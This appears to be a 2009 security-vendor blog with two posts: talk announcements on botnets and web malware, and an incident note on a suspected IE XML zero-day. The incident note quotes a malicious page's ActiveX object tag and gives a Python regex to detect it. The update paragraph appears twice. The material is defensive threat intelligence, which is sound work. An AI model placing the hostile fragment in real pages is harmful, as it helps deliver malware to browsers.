We're sharing our research at the upcoming ISOI6, the US Dept of Defense Cyber Crime conference, Internet2 Joint Techs, and at ShmooCon. If you are attending any of those events, we'd love to meet you in person!  Alex talks about McColo, I'll be discussing Web malware in government networks, Stu covers the latest in malware obfuscation tactics, and Julia dives into the Srizbi botnet takedown.  For dates, times, topics, and locations, please read on.

A few more details for those in the area / attending:

Internet Security Operations and Intelligence (ISOI) 6

Jan. 29 in Dallas, TX

Alex speaks on the topic of McColo on Jan 29 at 15:30.  He'll discuss our efforts in working with coordinating bodies of the Internet and the press to facilitate the disconnection of McColo from the Internet. He'll also discuss how McColo (and botnet C&Cs hosted there!) re-connected to the Internet and what the bot herders may have done during that brief time.

U.S. Department of Defense (DoD) Cyber Crime

Conference 2009

Jan. 30 in St. Louis, MO

I'll be speaking on the topic, "Web Malware: Combating the New Keys to the Kingdom."  My session is this Friday, Jan 30 from 11:00 to 11:50 a.m. as part of the Information Assurance Track. I'll cover the threat and how today's countermeasures have been largely ineffective in preventing both the initial Web malware intrusions and the subsequent call backs to C&C infrastructures. I'll also examine the malware infection cycle and discuss how government agencies can take preventative measures.

Internet2 Joint Techs

Feb. 4 in College Station, TX

Stu's speaking on the topic, "Web Malware Tech: Obfuscation and other Evasion Techniques". His session is next Wed, Feb 4, from 8:50 to 9:10 a.m., where he talks about the increasing criminal sophistication of Web malware. He covers how a deadly cocktail of threats, such as phishing spam containing URLs that load Web pages laced with obfuscated code, has made almost all security technologies obsolete. For example, pretty much all serious Web malware infections use obfuscation as a way to infiltrate via port 80.

ShmooCon 2009

Feb. 6 in Washington, DC

Julia's session (The Srizbi Botnet Takedown) is during the Main Track day on Feb 6 at 17:00.  Julia covers how FireEye was able to hijack the Srizbi botnet, which was responsible for about 75% of all of the spam worldwide.

Hope to see a few of you there!

On the new Explorer XML zero day

See update below!

Shadowserver is reporting on websites serving up a new zero-day Internet Explorer exploit involving XML (see also SecurityFocus and an initial, so-far-sketchy Microsoft advisory). For the sake of our customers (and potential customers!) I wanted to tentatively report that a) indeed, this appears to be a real factor in the wild by now, and b) the FireEye product does appear to be correctly detecting it in at least one case. I checked around a few boxes I have access to and found a VM-verified web infection event which was initiated from the web server (that IP address should be assumed to be armed and dangerous). Our statistical anomaly algorithms picked up on the following piece of JavaScript (this is a screenshot, so it should be harmless unless you retype it):

[Picture 289: screenshot of the flagged JavaScript]
I haven't seen this <object id=xmltarget classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5"> in malicious JavaScript recently enough that I can recall it off the top of my head, and some grepping on the boxes I checked found only this one event like this in the last month. "88d969c5-f192-11d4-a65f-0040963251e5" turns out to be the class ID for the ActiveX control that implements XMLHTTP within Microsoft XML Core Services, so it seems likely that this is an instance of the new exploit (though I haven't verified that yet). There was a vulnerability in this component back in 2006 (e.g., see the Securiteam advisory from that time). If so, it's at least possible that the instructions at that link for disabling that component would also be protective here. That would be less impactful than not browsing with IE 7. (Again, I stress that I haven't confirmed that speculation; I'm throwing out the possibility in case it's helpful to others in the community.)
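If you want to hunt for this pattern in your own captured pages, a trivial (and admittedly naive; it won't catch obfuscated instantiations) check is just to grep for that classid. A sketch:

```python
import re

# CLSID of the MSXML ActiveX control that implements XMLHTTP.
XMLHTTP_CLSID = "88d969c5-f192-11d4-a65f-0040963251e5"
pattern = re.compile(r'classid\s*=\s*["\']?CLSID:' + XMLHTTP_CLSID, re.IGNORECASE)

sample = '<object id=xmltarget classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5">'
print(bool(pattern.search(sample)))  # True
```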
More tomorrow hopefully.

Update: It turned out, when we investigated this in detail, that it's not related to the XML zero-day vulnerability. We've now seen four of these events at various customers with the same starting <object> tag with the same classid. We hadn't seen that particular form before, and Google does not find other discussions of it. The obfuscated body is polymorphic, but when deobfuscated it reveals a bunch of older browser/plugin exploits. One of the incidents succeeded in infecting the client, and on investigation, that turned out to be this fresh packing of the Grum bot. The destination IP of the exploit server was the same in all cases, and it's a known RBN IP address. The campaign appears to be driven by malicious ads. Thanks to Julia, Atif, and Alex for help in investigating, and apologies for any confusion: it appears to be a new obfuscation idiom and a new packing that was not recognized by almost any AV, but not a new exploit; it's just coincidence that the XMLHTTP classid was used on the same day that the new XML exploit was out.
It turned out when we investigated this in detail that it's not related to the XML zero-day vulnerability.  We've now seen four of these events at various customers with the same starting <object> tag with the same classid.  We haven't seen that particular form before, and Google does not find other discussions of it.  The obfuscated body is polymorphic but when deobfuscated reveals a bunch of older browser/plugin exploits.  One of the incidents succeeded in infecting the client, and on investigation, that turned out to be this fresh packing of the Grum bot.  The destination IP of the exploit server was the same in all cases, and it's a known RBN IP address.  The campaign appears to be driven by malicious ads.  Thanks to Julia, Atif, and Alex for help in investigating, and apologies for any confusion: it appears to be a new obfuscation idiom and a new packing that was not recognized by almost any AV, but not a new exploit - just coincidence that the XMLHTTP classid was used on the same day that the new XML exploit was out.